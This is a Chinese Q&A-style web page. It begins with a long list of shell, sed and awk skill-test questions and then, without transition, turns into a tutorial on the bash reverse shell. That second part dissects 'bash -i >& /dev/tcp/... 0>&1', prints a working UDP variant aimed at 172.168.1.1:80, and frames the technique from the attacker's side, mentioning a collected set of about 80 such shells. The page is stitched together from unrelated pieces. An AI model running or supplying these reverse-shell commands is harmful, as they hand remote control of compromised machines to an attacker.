百科狗-知识改变命运!
--

需要linux的练习题

桃子1年前 (2023-12-05)阅读数 16#综合百科
文章标签文件攻击者

需要linux的练习题

真的很有自信吗?

我给你来点把 哈哈

[ SHELL 水平测试 ][ OVERVIEW 篇 ]

1. 有很多种 shell, 你熟悉几种? 各个 shell 的 home page 在那里?

2. 为什么说 zsh 是目前为止功能最为强大的 shell.

3. 为什么说 pdksh 功能较弱?

4. ksh88 与 ksh93 有何区别?

5. 为什么 shell 编程最好用 ksh?

6. 你的系统都有哪些 shell? 版本是多少?

7. 你知道 POSIX 吗?最新版本是多少?和你的 shell 有什么关系?

8. /sbin/sh 和 /bin/sh 有何区别?

9. 你分析过 1000 行以上的 shell 程序吗?

10. 各种 shell 的变量名长度有何限制?

11. 各种 shell 的 array size 有何限制?

12. FIFO 比 co-process 有什么优点?

13. (..) 产生的 subshell 与调用另一个脚本产生的 subshell 有何不同?

14. shell 中的函数可以递归吗?设计时要注意什么?

15. 如何用 subshell 产生的多个值改变多个 shell 中的变量?

16. File pattern 与 regular expression 有什么不同?

17. shell 中含有大量文档.不想在每行之前用 # 注释. 有那两种方法可以实现?

18. 用 shell 程序安装配置一个二进制可执行软件.希望将被安装软件含在 shell 程序中形成一个

安装文件, 可以吗?

19. 可以在一个shell 程序里包含 ksh 及 perl 两种代码吗?

20. 如何保证 shell 程序只有单一 instance 运行? (有难度, 绝非一个 ps 命令可以搞定)

21. 当有同名的 alias, function, builtin command, external command 时,如何知道并控制其运行顺序?

22. 如何在自定义 function 中调用同名的 builtin command ?

23. 怎样运行各种 shell 时具有 login shell 的行为?

24. 为何 ksh, rksh, pfksh 都是同一个 hard link? 功能却不同?

25. 当 while read .. 这样的语句用于 pipe 右侧时,需注意什么?

26. 对于多个相连的 pipe,最后的返回码是 pipe 中那个命令的? 如何取得所有命令的返回码?

27. cmd >a 2>a 和 cmd >a 2>&1 为什么不同?

28. Stdin, Stderr 可以关闭吗? 有什么结果?

29. GNU tools 与其他 Unix 上的相比有什么特点? 为什么说不能过分依赖 GNU 扩展?

30. VI 及 VIM 对行长度及 file size 有什么限制?

31. 请写出对 field 1 (数字), field 3 (数字倒序), field 3 (ascii) 进行排序的完整语句.

32. 如何用 diff 及其他工具写一个版本控制系统?(要有 check in, check out, file lock .. 等功能)

################################

[ SHELL 水平测试 ][ SED 篇 ]

1. 你能看懂 sed one-lines 中的每一条语句吗?

2. /regex/! command 与 /regex/ !command 有什么区别?

3. 你能熟练使用 N,n, P,p,D,d,H,h,G,g,x,:,b,t 吗?

4. 什么是 sed 高级编程中的 lookup table 技术

5. sed debuger 的原理是什么?

6. 为什么 sed 的 guru 和 fans 比 awk 的多.(请看 yahoo groups)

下面几题根据使用的技术,难度不同.(难度 最小:1,最大:5)

7. 将数据文件中的每个词的第一个字母变成大写. (难度: 2 - 4)

8. 在 sed 中实现记数器.可加 1 或减 1. (难度: 3 - 4)

9. 提取 html 文件中 table 中每个单员的内容(table 可嵌套).(难度: 4 - 5)

每一个 cell 做为一个单员输出:

Table #1, Row #1, Column #1

Contents .......

Table #1, Row #1, Column #2

Contents .......

10. 一般的 sed 的 regex 的匹配都是 greedy 的。如何用 sed 实现 lazy 匹配?

############################

[ SHELL 水平测试 ][ AWK 篇 ]

1. awk, oawk, nawk, gawk, mawk 有什么区别?

2. 在一个 awk 文件中, 第一行可以如下吗?

#! /bin/awk -F: -f

3. awk -F"" 与 awk -F "" 有区别吗?

4. 可以这样设置 FS 吗?

FS = "[ \t]+\|[ \t]+"

5. gawk 有一个扩展表达式与其他 GNU 工具不同, 是哪个, 为什么?

6. 那两种方法可以实现大小写无关匹配?

7. 下列两句有何区别?

awk '$0 ~ "[ \t\n]"'

awk '$0 ~ /[ \t\n]/'

8. FS=" " 和 FS=" +" 有何区别?

9. 如何将每一个字符作为一个 field ?

10. 如何将整个文件作为一个 field ?

11. RS="" 与 RS="\n\n+" 有何区别?

12. NR 和 FNR 有何区别?

13. getline

14. 如何不打印最后一个 field? (不用循环)

15. $1 ~ /aaa/ 与 /aaa/ ~ $1 有何区别?

16. a = /a/ 是什么意思?

17. awk 中的 array 可以排序吗?

18. 如何将 awk 中得到的值赋给 shell 变量.

19. 如何模拟二维数组?

20. 你的 awk 数组最多可能的单元是多少?有限制没有?

21. 你的 awk 中 field number, record length 及 file size 有何限制?

22. awk 中如何删除 array 及 关闭管道?

23. 如何完成 rev 功能?

24. 如何在 awk 中使用 coprocess?

25. 你写过 100 行以上的 awk 程序吗?

我看你是的学习态度有问题!

将这句话拆开来看, bash -i , >& , /dev/tcp/ , 0>&1 ,有三个知识点。

(1) bash -i 是打开一个交互的bash

(2) /dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

(3) >& 和 0>&1 这两个涉及到Linux文件描述符和重定向。此处的 & 是取地址符

(1)文件描述符

Linux启动时会默认打开三个文件描述符(实现文件读写操作),Linux把键盘、显示器等设备也当做文件用文件描述符进行控制,如果要修改默认设备就需要进行重定向。

(2)重定向

输入的重定向包括, > , n file ,n省略则默认是1。

错误输出的重定向有三种形式

其中, &> 和 >& 是一个意思,都是将标准错误输出合并到标准输出中。 2>&1 和 >file 可以用如下过程图表示

需要注意的是,上述输入输出重定向,将输入和输出绑定到文件或者设备只对该条指令有效,如果想要一直有效,就需要添加exec指令 exec n file/n

(3)复制

与之形似的是文件描述符的复制 n&m ,这两个都是将文件描述符 n 复制到 m ,两者的区别是,前者是以只读的形式打开,后者是以写的形式打开,因为读/写方式对于复制操作几乎没有影响所以两者基本可以看作是等价的。这里的 & 目的是区分以数字为名字的文件和文件描述符的数值,如果没有 & 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是另一个文件描述符。

此时再来看这句命令,可与理解为,创建一个可交互的bash和一个到172.168.1.1:80的TCP链接,然后将bash的输入输出错误都重定向到在172.168.1.1:80监听的进程。

首先,反弹shell可以理解为,攻击者监听在TCP/UDP端口,被控制端的请求被转发到该端口,可以控制其输入输出。一般攻击者攻击了一台机器,并用自己的主机去连接该机器的端口,这是一种“正向连接”,远程桌面、web服务、ssh、telnet等都是正向连接的一种。但是如果被攻击的机器处于内网中可能造成无法连接,或者有防火墙等限制,再或者攻击者需要进行实时控制,正向连接是无法满足需要的。所以有了“反向连接”,即让被攻击的主机主动去连接攻击者的服务器。

所以我们还可以从反向连接的角度来理解一下 0>&1 。如果只是 bash -i >& /dev/tcp/172.168.1.1/80 ,将输出描述符连接到了端口,该端口可接收到我们的输出,即我们正向连接了被攻击者的机器,但是我们输入shell后是无法看到回显的。回显只会显示在被攻击者的机器上。如果我们想要得到回显,需要将被攻击机器的输入描述符连接到我们监听的端口上。

也就是说如果我们想要看到回显,除了先将输出描述符连接到端口上,还需要将其输入描述符也连接到端口上。即输入描述符0和输出描述符1连接相同, 0>&1 即可解决。这就形成了一个回路,实现了远程交互式shell的功能。

不过这样的一条指令还不够完善,因为这条指令会使得我们在被攻击的机器上依然能看到我们在攻击者机器中执行的指令,那么解决办法就是将错误输出和标准输出进行混合,即将 bash -i > 换为 bash -i >&

Bash相关shell主要有以下几种:

刚才详细讲的是第一种bash shell,第二种是将 >& 这种错误输出的混合方式改成了 2>&1 ,2代表错误输出,1代表标准输出,2指向了1,即输出混合了。文件描述符的复制 n&m 两种虽然读写不同但是对于shell的效果是等价的,即和 0>&1 效果相同。所以第二种就是第一种的变种。第四种同理,输入、输出、报错都定位到同一位置。第五种选了一个新的文件描述符196,道理类似。

对于第三种bash shell,exec已经在前面提到过可以持续连接,后面的关键点如下:

从文件中依次读取每一行,将其赋值给 line 变量(其他也可),之后在循环中对line进行操作。这里不再从文件中读取,而是通过管道符对攻击者机器上输入的命令进行依次执行,并且将标准输出和标准错误输出都重定向到了文件描述符5,也就是攻击机上,实现交互式shell的功能。

另外,本文最开始的时候说到/dev/tcp/是Linux中的一个特殊设备类似的还有/dev/udp/,按照tcp的方式直接改成udp就行。

sh -i >& /dev/udp/172.168.1.1/80 0>&1

除了bash还有很多其他借用第三方工具(nc、telnet、socat、xterm)或使用脚本语言(python、Perl、Ruby、Go、PHP、Lua、JAVA、gawk、Powershell)反弹shell的方式,这里就不一一列举了,原理类似。写这篇文章总结shell的过程中顺手将网络上的shell进行了收集,将近80条,写了BashShell.py,就是个简单的查询shell的工具,有需要的下方留言

鹏仔微信 15129739599 鹏仔QQ344225443 鹏仔前端 pjxi.com 共享博客 sharedbk.com

免责声明:我们致力于保护作者版权,注重分享,当前被刊用文章因无法核实真实出处,未能及时与作者取得联系,或有版权异议的,请联系管理员,我们会立即处理! 部分文章是来自自研大数据AI进行生成,内容摘自(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供学习参考,不准确地方联系删除处理!邮箱:344225443@qq.com)

图片声明:本站部分配图来自网络。本站只作为美观性配图使用,无任何非法侵犯第三方意图,一切解释权归图片著作权方,本站不承担任何责任。如有恶意碰瓷者,必当奉陪到底严惩不贷!

内容声明:本文中引用的各种信息及资料(包括但不限于文字、数据、图表及超链接等)均来源于该信息及资料的相关主体(包括但不限于公司、媒体、协会等机构)的官方网站或公开发表的信息。部分内容参考包括:(百度百科,百度知道,头条百科,中国民法典,刑法,牛津词典,新华词典,汉语词典,国家院校,科普平台)等数据,内容仅供参考使用,不准确地方联系删除处理!本站为非盈利性质站点,本着为中国教育事业出一份力,发布内容不收取任何费用也不接任何广告!)